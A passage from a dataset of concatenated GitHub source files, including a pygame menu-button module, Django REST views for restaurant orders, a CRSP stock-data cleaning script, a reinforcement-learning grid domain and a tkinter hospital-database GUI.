size):\n\t\tsuper().__init__()\n\t\tnormal_image = pg.image.load(button_images[name][0]).convert_alpha()\n\t\thovered_image = pg.image.load(button_images[name][1]).convert_alpha()\n\n\t\tself.hovered_image = pg.transform.scale(hovered_image, size)\n\t\tself.normal_image = pg.transform.scale(normal_image, size)\n\n\t\tself.image_rect = self.normal_image.get_rect()\n\n\t\tself.image = pg.Surface(self.image_rect.size, flags=pg.SRCALPHA)\n\t\tself.image.set_colorkey('white')\n\t\tself.rect = self.image.get_rect()\n\n\t\tself.hovered = False\n\t\tself.pressed = False\n\n\t\tself.click = pg.mixer.Sound(audio_paths['button'])\n\t\tself.click.set_volume(0.5)\n\n\tdef check_hover(self, mouse_pos):\n\t\tif (self.rect.left <= mouse_pos[0] <= self.rect.right) and (self.rect.top <= mouse_pos[1] <= self.rect.bottom):\n\t\t\tself.hovered = True\n\t\t\tself.image.blit(self.hovered_image, (0, 0))\n\t\telse:\n\t\t\tself.hovered = False\n\t\t\tself.image.blit(self.normal_image, (0, 0))\n\n\tdef update(self, mouse_down, mouse_position, sounds_on):\n\t\tself.check_hover(mouse_position)\n\t\tif self.hovered and mouse_down:\n\t\t\tself.pressed = True\n\t\telse:\n\t\t\tself.pressed = False\n\n\nclass AudioButton(Button):\n\tdef __init__(self, name, size, is_audio_on):\n\t\tsuper().__init__(name, size)\n\t\tname = name.replace('on', 'off')\n\t\tself.image_off = pg.transform.scale(pg.image.load(button_images[name][0]).convert_alpha(), size)\n\t\tself.image_off_hovered = pg.transform.scale(pg.image.load(button_images[name][1]).convert_alpha(), size)\n\t\tself.audio_on = True\n\n\t\tif not is_audio_on:\n\t\t\tself.toggle_audio(False)\n\n\tdef toggle_audio(self, sounds_on):\n\t\tif sounds_on:\n\t\t\tself.click.play()\n\t\tself.audio_on = not self.audio_on\n\t\tself.image_off, self.normal_image = self.normal_image, self.image_off\n\t\tself.image_off_hovered, self.hovered_image = self.hovered_image, self.image_off_hovered\n\n\nclass ButtonGroup(pg.sprite.Group):\n\tdef __init__(self, buttons, display_size):\n\t\tself.WIDTH = display_size[0]\n\t\tself.HEIGHT = display_size[1]\n\t\tsuper().__init__(buttons)\n\t\tself.place_buttons()\n\n\tdef place_buttons(self):\n\t\ty = self.HEIGHT * 3 / 4\n\t\tcurrent_x = self.WIDTH / (len(self.buttons) + 1)\n\t\tfor button in self.buttons:\n\t\t\tbutton.rect.center = (current_x, y)\n\t\t\tcurrent_x += self.WIDTH / (len(self.buttons) + 
1)\n\n\nclass MenuButtonGroup(ButtonGroup):\n\tdef __init__(self, display_size):\n\t\t# start button\n\t\tself.start_btn = Button('start', (180, 180))\n\t\t# quit button\n\t\tself.quit_btn = Button('quit', (180, 180))\n\t\t# settings button\n\t\tself.settings_btn = Button('settings', (180, 180))\n\t\tself.buttons = [self.start_btn, self.settings_btn, self.quit_btn]\n\t\tsuper().__init__(self.buttons, display_size)\n\n\nclass PauseButtonGroup(ButtonGroup):\n\tdef __init__(self, display_size):\n\t\t# start button\n\t\tself.start_btn = Button('start', (180, 180))\n\t\t# quit button\n\t\tself.quit_btn = Button('quit', (180, 180))\n\t\t# restart button\n\t\tself.restart_btn = Button('restart', (180, 180))\n\t\t# settings button\n\t\tself.settings_btn = Button('settings', (180, 180))\n\t\tself.buttons = [self.start_btn, self.restart_btn, self.settings_btn, self.quit_btn]\n\t\tsuper().__init__(self.buttons, display_size)\n\n\nclass GameoverButtonGroup(ButtonGroup):\n\tdef __init__(self, display_size):\n\t\t# quit button\n\t\tself.quit_btn = Button('quit', (180, 180))\n\t\t# restart button\n\t\tself.restart_btn = Button('restart', (180, 180))\n\t\t# settings button\n\t\tself.settings_btn = Button('settings', (180, 180))\n\t\tself.buttons = [self.restart_btn, self.settings_btn, self.quit_btn]\n\t\tsuper().__init__(self.buttons, display_size)\n\n\nclass SettingsButtonGroup(ButtonGroup):\n\tdef __init__(self, display_size, music_on, sounds_on):\n\t\t# go back button\n\t\tself.back_btn = Button('back', (180, 180))\n\t\t# music management button\n\t\tself.music_btn = AudioButton('music_on', (180, 180), music_on)\n\t\t# sound management button\n\t\tself.sound_btn = AudioButton('sound_on', (180, 180), sounds_on)\n\t\tself.buttons = [self.back_btn, self.music_btn, self.sound_btn]\n\t\tsuper().__init__(self.buttons, display_size)\n","repo_name":"aronLev2065/midieval-apocalypse-game","sub_path":"data/code/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24273582142","text":"from web.models import *\nfrom django.http import JsonResponse\nfrom restapi.serializers import *\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\nfrom rest_framework import status\nfrom rest_framework.response import Response\nimport datetime\n\n\nCONTENT_NOT_FOUND = {'Message': 'Content Not Found'}\n\n\n# Providing a beacon id, return the available menus for this restaurant.\n@api_view(['GET', 'POST'])\n@csrf_exempt\ndef menu_list2(request):\n    if request.method == 'POST':\n        beacon_id = request.data['beacon']\n        menus = Menu.objects.filter(Res_id_id=Beacon.objects.get(Beacon_id=beacon_id).Res_id)\n        now = datetime.datetime.now().hour\n        # find the available menus based on the current time\n        if now < 11: # morning time\n            ava_menus = menus.exclude(Type='DN').exclude(Type='LN')\n        elif now < 16: # lunch time\n            ava_menus = menus.exclude(Type='DN').exclude(Type='BK')\n        else: # dinner time\n            ava_menus = menus.exclude(Type='LN').exclude(Type='BK')\n\n        if ava_menus:\n            ser = MenuSerializer(ava_menus, many=True)\n            return Response(ser.data, status=status.HTTP_200_OK)\n        return JsonResponse(CONTENT_NOT_FOUND, safe=False, status=status.HTTP_404_NOT_FOUND)\n\n    return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n\n# Record the payment info providing an order id\n@api_view(['POST'])\n@csrf_exempt\ndef pay(request):\n    if request.method == 'POST':\n        # prevent the user from double-
paying an order\n        if Payment.objects.filter(Order_id=request.data['Order_id']):\n            return Response(\"You have paid the order already\", status=status.HTTP_200_OK)\n        # post a payment entry in database\n        ser = PaymentSerializer(data=request.data)\n        if ser.is_valid():\n            ser.save()\n            return Response(ser.data, status=status.HTTP_200_OK)\n        # the client did not post the valid data\n        return Response(ser.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n\n# Place an item in the order when a customer adds an item in the shopping cart\n@api_view(['POST'])\n@csrf_exempt\ndef order_item(request):\n    if request.method == 'POST':\n        serializer = OrderItemSerializer(data=request.data)\n\n        if serializer.is_valid():\n            serializer.save()\n            return Response(serializer.data, status=status.HTTP_201_CREATED)\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n\n# Create a new order\n@api_view(['POST'])\n@csrf_exempt\ndef new_order(request):\n    if request.method == 'POST':\n        serializer = OrderSerializer(data=request.data)\n\n        if serializer.is_valid():\n            serializer.save()\n            return Response(serializer.data, status=status.HTTP_200_OK)\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n\n# Given the restaurant id, get the information of this restaurant.\ndef get_res_info(request, str):\n    if request.method == 'GET':\n        info = Restaurant.objects.get(Res_id=str)\n\n        if info:\n            ser = ResSerializer(info)\n            return JsonResponse(ser.data, safe=False)\n        return JsonResponse(CONTENT_NOT_FOUND, safe=False, status=status.HTTP_404_NOT_FOUND)\n\n    return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n\n# Get the product info for a menu\ndef menu_item(request, str):\n    if request.method == 'GET':\n        items = Product.objects.filter(menu_item__Menu_id=str)\n\n        if items:\n            ser = MenuItemSerializer(items, many=True)\n            return JsonResponse(ser.data, safe=False)\n        return JsonResponse(CONTENT_NOT_FOUND, safe=False, status=status.HTTP_404_NOT_FOUND) \n    return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n\n# test code\ndef menu_list(request, str):\n    if request.method == 'GET':\n        menus = Menu.objects.filter(Res_id_id=str)\n        ser = MenuSerializer(menus, many=True)\n        return JsonResponse(ser.data, safe=False)\n    return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n","repo_name":"wtt4477/BracoStore5_capstone","sub_path":"capstone/restapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33858985576","text":"\"\"\"\nDescription: Cleans the CRSP database to only include entries with valid returns and\nto ensure every stock is uniquely identified by Permco-datadate.\n\n\nI rename some variables and collapse share classes. In the combined share classes, I\nadd up the market cap of each share class to get to the total market cap of that\ncompany at that time. 
Returns are also computed as market cap weighted returns of the\nindividual share classes.\n\"\"\"\n\n# Custom functions for data cleaning\nfrom utils import *\nimport numpy as np\nfrom copy import copy\n\n# Proper data cleaning\n################ Import Data ################\nprint_message('Loading Data')\ncrsp_raw = pd.read_csv('../Data/crsp.txt', sep = '\\t', low_memory = False)#, nrows = 10000)\n\n# Filter down to only common shares\ncrsp_raw = crsp_raw.loc[(crsp_raw['SHRCD'] == 10) | (crsp_raw['SHRCD'] == 11)]\n\nprint('Data Size:')\nprint(crsp_raw.shape)\nprint(str(crsp_raw.shape[0] * crsp_raw.shape[1]) + ' observations')\n\n################ Setting Types ################\nprint_message('Setting Types')\ncrsp_datatypes = {'date_vars': ['date'],\n                  'float_vars': ['BIDLO', 'ASKHI', 'PRC', 'RET', 'DLRET', 'BID', 'ASK', 'RETX', 'CFACPR', 'CFACSHR'],\n                  'int_vars': ['PERMNO', 'PERMCO', 'HSICCD', 'CUSIP', 'SHROUT', 'VOL', 'EXCHCD']}\ncrsp = clean_data(copy(crsp_raw), crsp_datatypes)\n\n################ Renaming Variables ################\nprint_message('Renaming Variables')\ncrsp_names = {'RET': 'Return',\n              'SHROUT': 'Shares Outstanding on Trading Day',\n              'COMNAM': 'Company Name',\n              'EXCHCD': 'Exchange Code',\n              'TICKER': 'Ticker',\n              'date': 'datadate',\n              'PERMNO': 'Permno',\n              'PERMCO': 'Permco',\n              'PRC': 'Price with Flag',\n              'BID': 'Bid',\n              'ASK': 'Ask',\n              'VOL': 'Volume on Trading Day',\n              'SHRCLS': 'Share Class',\n              'CFACPR': 'Price Adjustment Factor',\n              'CFACSHR': 'Share Adjustment Factor'}\n\ncrsp = crsp.rename(index = str, columns = crsp_names)\ncrsp = crsp[list(crsp_names.values())]\n\n# Make a few fundamental variables\nprint_message('Create new features')\ncrsp['Imputed Price'] = (crsp['Price with Flag'] < 0)\ncrsp['Price on Trading Day'] = np.abs(crsp['Price with Flag'])\ncrsp['Price'] = crsp['Price on Trading Day'] / crsp['Price Adjustment Factor']\ncrsp['Shares Outstanding'] = crsp['Shares Outstanding on Trading Day'] * crsp['Share Adjustment Factor']\ncrsp['Volume'] = crsp['Volume on Trading Day'] * crsp['Share Adjustment Factor']\ncrsp['Market Cap (Billions, CRSP)'] = crsp['Shares Outstanding'] * crsp['Price'] / 1e6\ncrsp = crsp.drop(['Price on Trading Day', 'Shares Outstanding on Trading Day', 'Volume on Trading Day'], axis = 1)\n\n################\nprint_message('Aggregating share classes')\nAGG_VAR_TYPES = {'First': ['Company Name', 'Permno', 'Ticker', 'Price', 'Bid', 'Ask', 'Exchange Code'],\n                 'Add': ['Market Cap (Billions, CRSP)'],\n                 'Market Cap Weighted Sum': ['Return'],\n                 'Price Weighted Sum': ['Volume']}\n\nALL_CRSP_VAR = [item for sublist in AGG_VAR_TYPES.values() for item in sublist]\n\ndef agg_share_classes(company_on_date):\n    \"\"\"\n    Given a dataframe grouped on Permco and datadate, aggregates up the key variables from the individual\n    share classes. 
The operation done on each variable is defined by the global dictionary AGG_VAR_TYPES.\n\n    :param company_on_date - a dataframe from a pandas groupby object with all the variables inside ALL_CRSP_VAR\n    :return a dataframe with one row that has all the variables in ALL_CRSP_VAR, aggregated across the share classes\n    \"\"\"\n\n    company_on_date.safe_drop(['_Group'], inplace = True) # Addition to make it work well with the parallel process\n\n    # If only one share class\n    if company_on_date.shape[0] <= 1:\n        return company_on_date[ALL_CRSP_VAR]\n\n    # Then for the remaining cases\n    company_on_date['Market Cap (Billions, CRSP)'].fillna(0)\n    company_on_date.sort_values(by = ['Market Cap (Billions, CRSP)'], ascending = False, inplace = True)\n    new_frame = company_on_date.iloc[0, :][AGG_VAR_TYPES['First']]\n\n    for v in AGG_VAR_TYPES['Add']:\n        new_frame[v] = company_on_date[v].fillna(0).sum()\n\n    for v in AGG_VAR_TYPES['Market Cap Weighted Sum']:\n        valid = ~company_on_date[v].isnull()\n        denominator = company_on_date.loc[valid, 'Market Cap (Billions, CRSP)'].sum()\n\n        if denominator > 0:\n            new_frame[v] = (company_on_date.loc[valid, v] * company_on_date.loc[\n                valid, 'Market Cap (Billions, CRSP)']).sum() / denominator\n        else:\n            new_frame[v] = company_on_date[v][0]\n\n    for v in AGG_VAR_TYPES['Price Weighted Sum']:\n        valid = ~company_on_date[v].isnull()\n        denominator = new_frame['Price']\n\n        if denominator > 0:\n            new_frame[v] = (company_on_date.loc[valid, v] * company_on_date.loc[\n                valid, 'Price']).sum() / denominator\n        else:\n            new_frame[v] = company_on_date[v][0]\n\n    return new_frame\n\n# First, pull every permco-date that isn't paired\ncrsp = crsp.set_index(['Permco', 'datadate'])\ncrsp_counts = check_unique(crsp, ['Permco', 'datadate'])\n\n# Then isolate the problem observations\ncrsp_merge = crsp_counts.join(crsp, how = 'outer')\nproblem_children = crsp_merge.loc[~pd.isnull(crsp_merge['Count']), ALL_CRSP_VAR]\n\nif problem_children.shape[0] > 0:\n    good_children = crsp_merge.loc[pd.isnull(crsp_merge['Count']), ALL_CRSP_VAR]\n    merged_problems = parallel_apply(problem_children, ['Permco', 'datadate'], agg_share_classes, 2, None)\n    merged_problems = merged_problems[ALL_CRSP_VAR]\n\n    # Combine the dataframes together again\n    crsp_merge = pd.concat([good_children[ALL_CRSP_VAR], merged_problems])\n\nprint_message('Dropping Null Returns')\ncrsp_merge = crsp_merge.loc[~pd.isnull(crsp_merge['Return'])]\n\n#######\nprint_message('Verifying data integrity')\ncrsp_merge = crsp_merge.safe_index(['Permco', 'datadate'])\n\n# Check final assumptions on the data\n# 1. Permco + datadate uniquely identify each observation\n# 2. 
For each permco, there is a continuous stream of returns without interruption\n\n# Unique identification\nduplicated_values = check_unique(crsp_merge, ['Permco', 'datadate'])\nprint('Duplicated permco-date pairs')\nprint(duplicated_values)\nassert(duplicated_values.shape[0] == 0)\n\n# Continuity of returns\nvalid_returns = parallel_apply(crsp_merge, ['Permco'], continuous_index, 2, None)\ndiscontinuous_returns = valid_returns.loc[~valid_returns]\nprint('Companies without continuous returns')\nprint(discontinuous_returns)\nassert(discontinuous_returns.shape[0] == 0)\n\n################\nprint_message('Outputting Data')\ncrsp_merge.to_hdf('../Output/crsp.h5', 'crsp')\n\nwith open('../Logs/crsp.log', 'w') as f:\n    f.write('Raw CRSP file has been written')\n","repo_name":"luluywang/compustat_crsp","sub_path":"Code/write_crsp.py","file_name":"write_crsp.py","file_ext":"py","file_size_in_byte":6865,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"20296293401","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n# start with a scatter plot\nplt.scatter(X[:,0],X[:,1],c=y,s=50,cmap=\"rainbow\")\nax = plt.gca() # get the current axes; create a new one if none exists\n\n# get the min and max of both coordinate axes on the plane\nxlim = ax.get_xlim()\nylim = ax.get_ylim()\n \n# form 30 evenly spaced values between the min and the max\naxisx = np.linspace(xlim[0],xlim[1],30)\naxisy = np.linspace(ylim[0],ylim[1],30)\n \naxisy,axisx = np.meshgrid(axisy,axisx)\n# we will use the 2D arrays formed here as the X and Y of the contour function\n# meshgrid converts the two 1D vectors into feature matrices\n# the core idea is to broadcast the two feature vectors so we get the x and y coordinates of y.shape * x.shape points\n \nxy = np.vstack([axisx.ravel(), axisy.ravel()]).T\n# ravel() flattens the arrays, and vstack stacks multiple 1D arrays of the same structure row by row\n# xy is the finished grid: dense points covering the whole canvas\n \nplt.scatter(xy[:,0],xy[:,1],s=1,cmap=\"rainbow\")\n \n\n\n\n\n# understanding what meshgrid and vstack do\na = np.array([1,2,3])\nb = np.array([7,8])\n# how many coordinates do the pairwise combinations give?\n# the answer is 6: (1,7),(2,7),(3,7),(1,8),(2,8),(3,8)\n \nv1,v2 = np.meshgrid(a,b)\n \nv1\n \nv2\n \nv = np.vstack([v1.ravel(), v2.ravel()]).T\n","repo_name":"0meou0/Machine-Learning","sub_path":"仓库/生成网格.py","file_name":"生成网格.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40924015024","text":"'''\r\nModified on Sep. 
22, 2018\r\n\r\n@author: Michael Gimelfarb\r\n'''\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nfrom domains.Domain import Domain\r\n\r\n# possible movement directions\r\nLEFT, UP, RIGHT, DOWN = 0, 1, 2, 3\r\n\r\n\r\nclass TourDeFlags(Domain):\r\n\r\n def __init__(self, maze, initial):\r\n super().__init__()\r\n self.initial = (initial[0], initial[1], 0)\r\n self.maze = maze\r\n self.height, self.width = maze.shape\r\n\r\n # count all the sub-goals and free cells\r\n self.goals = 0\r\n self.free_cells = set()\r\n for c in range(self.width):\r\n for r in range(self.height):\r\n if maze[r, c] > 0:\r\n self.goals = max(self.goals, maze[r, c])\r\n elif maze[r, c] == 0:\r\n self.free_cells.add((r, c))\r\n\r\n # max steps to the goal\r\n self.max_steps = max(200, self.goals * (self.width + self.height))\r\n\r\n def copy(self):\r\n return TourDeFlags(np.copy(self.maze), self.initial)\r\n\r\n def initial_state(self):\r\n return self.initial\r\n\r\n def valid_actions(self):\r\n return [LEFT, UP, RIGHT, DOWN]\r\n\r\n def check(self, row, col, action):\r\n if (row == 0 and action == UP) or \\\r\n (row == self.height - 1 and action == DOWN) or \\\r\n (col == 0 and action == LEFT) or \\\r\n (col == self.width - 1 and action == RIGHT):\r\n return False\r\n return True\r\n\r\n def act(self, state, action):\r\n\r\n # perform the movement\r\n row, col, collected = state\r\n if self.check(row, col, action):\r\n if action == LEFT:\r\n col -= 1\r\n elif action == UP:\r\n row -= 1\r\n elif action == RIGHT:\r\n col += 1\r\n elif action == DOWN:\r\n row += 1\r\n else:\r\n return (row, col, collected), -2.0, False\r\n\r\n # compute the new state, status and reward\r\n grid_x1y1 = self.maze[row, col]\r\n if grid_x1y1 > 0:\r\n if collected + 1 == grid_x1y1:\r\n if collected + 1 == self.goals:\r\n return (row, col, collected + 1), -1.0, True\r\n else:\r\n return (row, col, collected + 1), -1.0, False\r\n elif collected >= grid_x1y1:\r\n return (row, col, collected), -1.0, False\r\n else:\r\n return (row, col, collected), -2.0, False\r\n else:\r\n return (row, col, collected), -1.0, False\r\n\r\n def render(self, policy, encoder, time=0.02):\r\n act = self.act\r\n state = self.initial_state()\r\n done = False\r\n im = None\r\n grid = np.copy(self.maze).astype('float')\r\n for row in range(self.height):\r\n for col in range(self.width):\r\n if grid[row, col] == -1:\r\n grid[row, col] = 0.0\r\n elif grid[row, col] == 0:\r\n grid[row, col] = 1.0\r\n else:\r\n grid[row, col] = 0.5\r\n steps = 0\r\n while not done and steps < self.max_steps:\r\n state_enc = encoder(state)\r\n action = policy(state_enc)\r\n new_state, _, done = act(state, action)\r\n if state == new_state:\r\n break\r\n row, col, _ = state = new_state\r\n grid[row, col] = 0.25\r\n if not im:\r\n im = plt.imshow(grid, cmap='gray', vmin=0, vmax=1)\r\n else:\r\n im.set_data(grid)\r\n plt.draw()\r\n plt.pause(time)\r\n grid[row, col] = 1.0\r\n steps += 1\r\n\r\n def default_encoding(self, state):\r\n\r\n # encoding is [e(row), e(col), e(collected)]^T\r\n input_dim = self.width + self.height + (1 + self.goals)\r\n arr = np.zeros(input_dim)\r\n row, col, collected = state\r\n arr[row] = 1.0\r\n arr[self.height + col] = 1.0\r\n arr[self.height + self.width + collected] = 1.0\r\n arr = arr.reshape((1, -1))\r\n return 
arr\r\n","repo_name":"mike-gimelfarb/bayesian-reward-shaping","sub_path":"domains/TourDeFlags.py","file_name":"TourDeFlags.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"5"} +{"seq_id":"15224171788","text":"from string import Template\nfrom urllib.parse import urlencode\nfrom webplex.router import local_request\n\n\ndef render_string(string, **context):\n template = Template(string)\n return template.safe_substitute(**context)\n\n\ndef render_template(filepath, **context):\n with open(filepath, \"r\") as f:\n contents = f.read()\n return render_string(contents, **context)\n\n\ndef url(*segments, **vars):\n base_url = local_request().application_url\n path = '/'.join(str(s) for s in segments)\n if not path.startswith('/'):\n path = \"/\" + path\n if vars:\n path += \"?\" + urlencode(vars)\n return base_url + path\n","repo_name":"xstrengthofonex/webplex","sub_path":"webplex/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6263488580","text":"def leiaInt(msg):\n while True:\n try:\n n = int(input(msg))\n except (ValueError, TypeError):\n print('\\033[31mERRO: Digite um número inteiro válido.\\033[m')\n continue\n except KeyboardInterrupt:\n print('\\n\\033[31mERRO: O usuário interrompeu o programa.\\033[m')\n return 0\n else:\n return n\n\n\nnum = leiaInt('Digite um valor: ')\nprint(f'Você digitou o número {num}')\n\n\n\n\n","repo_name":"nunes-moyses/Projetos-Python","sub_path":"Projetos Python/pythonexercicios/des113.py","file_name":"des113.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72877864793","text":"import pickle, json\nimport pandas as pd, numpy as np\n\nloaded_model = pickle.load(open('../../Deep Learning Model/finalized_model.sav', 'rb'))\nloaded_mapper = pickle.load(open('../../Deep Learning Model/mapper.pkl', 'rb'))\n\ndef preProcess(a, mapper,parameter_cols):\n data=list(a.values())\n colz=list(a.keys())\n dfx=pd.DataFrame(data=[data], columns=colz)\n dfx\n\n XX1=mapper.transform(dfx)\n XX2=dfx[parameter_cols]\n XX = np.hstack((XX1,XX2))\n return XX\n\ndef calculate_score(applicant_data):\n parameter_cols=['sub_grade_num', 'short_emp', 'emp_length_num','dti', 'payment_inc_ratio', 'delinq_2yrs',\n 'delinq_2yrs_zero', 'inq_last_6mths', 'last_delinq_none', 'last_major_derog_none', 'open_acc',\n 'pub_rec', 'pub_rec_zero','revol_util']\n required_fields = ['dti', 'inq_last_6mths', 'open_acc', 'emp_length_num', 'revol_util', 'grade', 'payment_inc_ratio', 'purpose', 'delinq_2yrs_zero', 'pub_rec_zero', 'pub_rec', 'short_emp', 'home_ownership', 'sub_grade_num', 'last_major_derog_none', 'last_delinq_none', 'delinq_2yrs']\n a = {}\n for field in required_fields:\n a[field] = applicant_data[field]\n\n XX=preProcess(a, loaded_mapper,parameter_cols)\n\n score = loaded_model.predict_proba(XX)[:,1][0]\n\n score = score * 10\n score = round(10 - score,2)\n\n return score\n","repo_name":"piy0999/CreditSense","sub_path":"bank_node/API/ml_helper.py","file_name":"ml_helper.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"5"} +{"seq_id":"72942179352","text":"import json\n\narena_objects_schema_path = 'schemas/input/arena-obj3d.json'\nobj_schema_path = 
'schemas/input/arena-schema-files.json'\noutput_folder = 'schemas/'\n\ndef main():\n with open(arena_objects_schema_path) as f:\n schema = json.load(f)\n\n with open(obj_schema_path) as f:\n obj_schema_file = json.load(f)\n\n definitions = schema['definitions']\n arena_objects = schema['definitions']['obj3d']['oneOf']\n\n component_definitions = {}\n for cobj_name in definitions:\n if (cobj_name == 'obj3d'): continue\n component = True\n for obj in arena_objects:\n obj_name = obj['$ref'][len('#/definitions/'):]\n if (obj_name == cobj_name):\n component = False\n break\n if (component):\n component_definitions[cobj_name] = definitions[cobj_name]\n\n base_obj = {\n 'definitions': component_definitions,\n 'title': '',\n 'description': '',\n 'properties': schema['properties'],\n 'required': schema['required']\n }\n\n obj_schemas = {}\n for obj in arena_objects:\n obj_name = obj['$ref'][len('#/definitions/'):]\n new_obj = base_obj\n new_obj['title'] = obj['title']\n new_obj['description'] = obj['description']\n new_obj['properties']['data'] = definitions[obj_name]\n new_obj['properties']['data']['title'] = f'{obj[\"title\"]} Data'\n new_obj_json = json.dumps(new_obj, indent=4)\n file = open(f'{output_folder}{obj_name}.json','w')\n file.write(new_obj_json)\n file.close()\n\n obj_schemas[obj_name]={\n 'file': f'schemas/{obj_name}.json',\n 'title': obj['title'],\n 'description': obj['description'],\n }\n\n obj_schemas.update(obj_schema_file)\n file = open(f'{output_folder}arena-schema-files.json','w')\n file.write(json.dumps(obj_schemas, indent=4))\n file.close()\n\n\"\"\"\n for key in definitions:\n print(key, '->', definitions[key])\n break\n\n file1 = open(\"myfile.txt\",\"w\")\n\"\"\"\n\nif __name__ == '__main__':\n main()\n","repo_name":"arenaxr/arena-schemas","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"13646212404","text":"from tkinter import *\r\nfrom tkinter import ttk\r\n\r\nimport sqlite3\r\nwith sqlite3.connect('project.db') as db:\r\n cursor=db.cursor()\r\n\r\n\r\n\r\nroot = Tk()\r\nroot.title(\"Hospital Database\")\r\nphoto=PhotoImage(file = \"hopsital.png\")\r\nroot.iconphoto(False, photo)\r\nframe=Frame(root)\r\nframe.pack()\r\nbotFrame = Frame(root)\r\n\r\ndef deleteExtra(name):\r\n temp=\"\"\r\n for n in name:\r\n if not(n=='(' or n=='\\'' or n==',' or n==')'):\r\n temp+=n\r\n return temp\r\ndef tupleToArray(arr1, number):\r\n y=0\r\n for n in number: #changing the count from tuple to int to use when creating the new array\r\n if not(n=='(' or n==',' or n==')'):\r\n y=n\r\n newArr = [\"\"]*y\r\n j=0\r\n for i in arr1: #goes through array of tuples\r\n for n in i: #goes through each tuple\r\n if not(n=='(' or n==',' or n==')'):\r\n newArr[j]=n\r\n j+=1\r\n return newArr \r\ndef strToDate(date):\r\n if len(date)==7:\r\n iter=0\r\n newDate=\"\"\r\n for i in date:\r\n if (iter==1) or (iter==3):\r\n newDate+=\"/\"\r\n newDate+=i\r\n iter+=1\r\n return newDate\r\n elif len(date)==8:\r\n iter=0\r\n newDate=\"\"\r\n for i in date:\r\n if (iter==2) or (iter==4):\r\n newDate+=\"/\"\r\n newDate+=i \r\n iter+=1 \r\n return newDate\r\n\r\ndef getUserName(idnumber):\r\n cursor.execute(\"SELECT f_name FROM employee WHERE emp_id = ?\", idnumber)\r\n name=str(cursor.fetchone())\r\n db.commit()\r\n newName=deleteExtra(name)\r\n return newName\r\n\r\ndef getPatientInfo(idnumber):\r\n cursor.execute(\"SELECT patient_id FROM treat_plan WHERE emp_id = 
?\", idnumber)\r\n arr=cursor.fetchall()\r\n db.commit()\r\n cursor.execute(\"SELECT COUNT(treat_id) FROM treat_plan WHERE emp_id = ?\", idnumber)\r\n x=cursor.fetchone()\r\n db.commit()\r\n \r\n newArr=tupleToArray(arr, x)\r\n \r\n #destroy the previous frame\r\n for widget in frame.winfo_children():\r\n widget.grid_remove()\r\n #creates the treeview\r\n tree=ttk.Treeview(frame)\r\n tree['columns'] = (\"ID\", \"FN\", \"LN\", \"Ailment\")\r\n tree.column(\"#0\", width=1, minwidth=0)\r\n tree.column(\"ID\", anchor=CENTER, width=10)\r\n tree.column(\"FN\", anchor=W)\r\n tree.column(\"LN\", anchor=W)\r\n tree.column(\"Ailment\", anchor=W)\r\n tree.heading(\"#0\", text=\"Label\", anchor=W)\r\n tree.heading(\"ID\", text=\"ID\", anchor=CENTER)\r\n tree.heading(\"FN\", text=\"First Name\", anchor=W)\r\n tree.heading(\"LN\", text=\"Last Name\", anchor=W)\r\n tree.heading(\"Ailment\", text=\"Ailment\", anchor=W)\r\n\r\n\r\n button4 = Button(frame, text=\"Press to enter Patient Info\", command=enterPatientInfo)\r\n button4.grid(row=0, column=0, pady=10)\r\n button6 = Button(frame, text=\"Access Patient Info\", command=viewPatientData)\r\n button6.grid(row=0, column=1, pady=10)\r\n backButton.grid(row=0, column=3, pady=10)\r\n iter=0\r\n for i in newArr:\r\n x=str(i)\r\n cursor.execute(\"SELECT f_name FROM patient WHERE patient_id = ?\", (x,))\r\n f_name=cursor.fetchone()\r\n db.commit()\r\n f_name=deleteExtra(f_name)\r\n\r\n cursor.execute(\"SELECT l_name FROM patient WHERE patient_id = ?\", (x,))\r\n l_name=cursor.fetchone()\r\n db.commit()\r\n l_name=deleteExtra(l_name)\r\n\r\n cursor.execute(\"SELECT ailment FROM treat_plan WHERE patient_id = ? AND emp_id = ?\", (x, idnumber,))\r\n ailment=cursor.fetchone()\r\n db.commit()\r\n ailment=deleteExtra(ailment) #all data for a single tuple\r\n \r\n tree.insert(parent='', index='end', iid=iter, text='Parent',values=(x, f_name, l_name, ailment))\r\n iter+=1\r\n tree.grid(row=1, column=0, columnspan=3)\r\n#enter new patient info \r\ndef enterPatientInfo():\r\n for widget in botFrame.winfo_children():\r\n widget.grid_remove()\r\n\r\n botFrame.pack(side=BOTTOM)\r\n \r\n button2.grid(row=0,column=7)\r\n\r\n label3 = Label(botFrame, text=\"Enter new info: \")\r\n label3.grid(row=0, column=0)\r\n 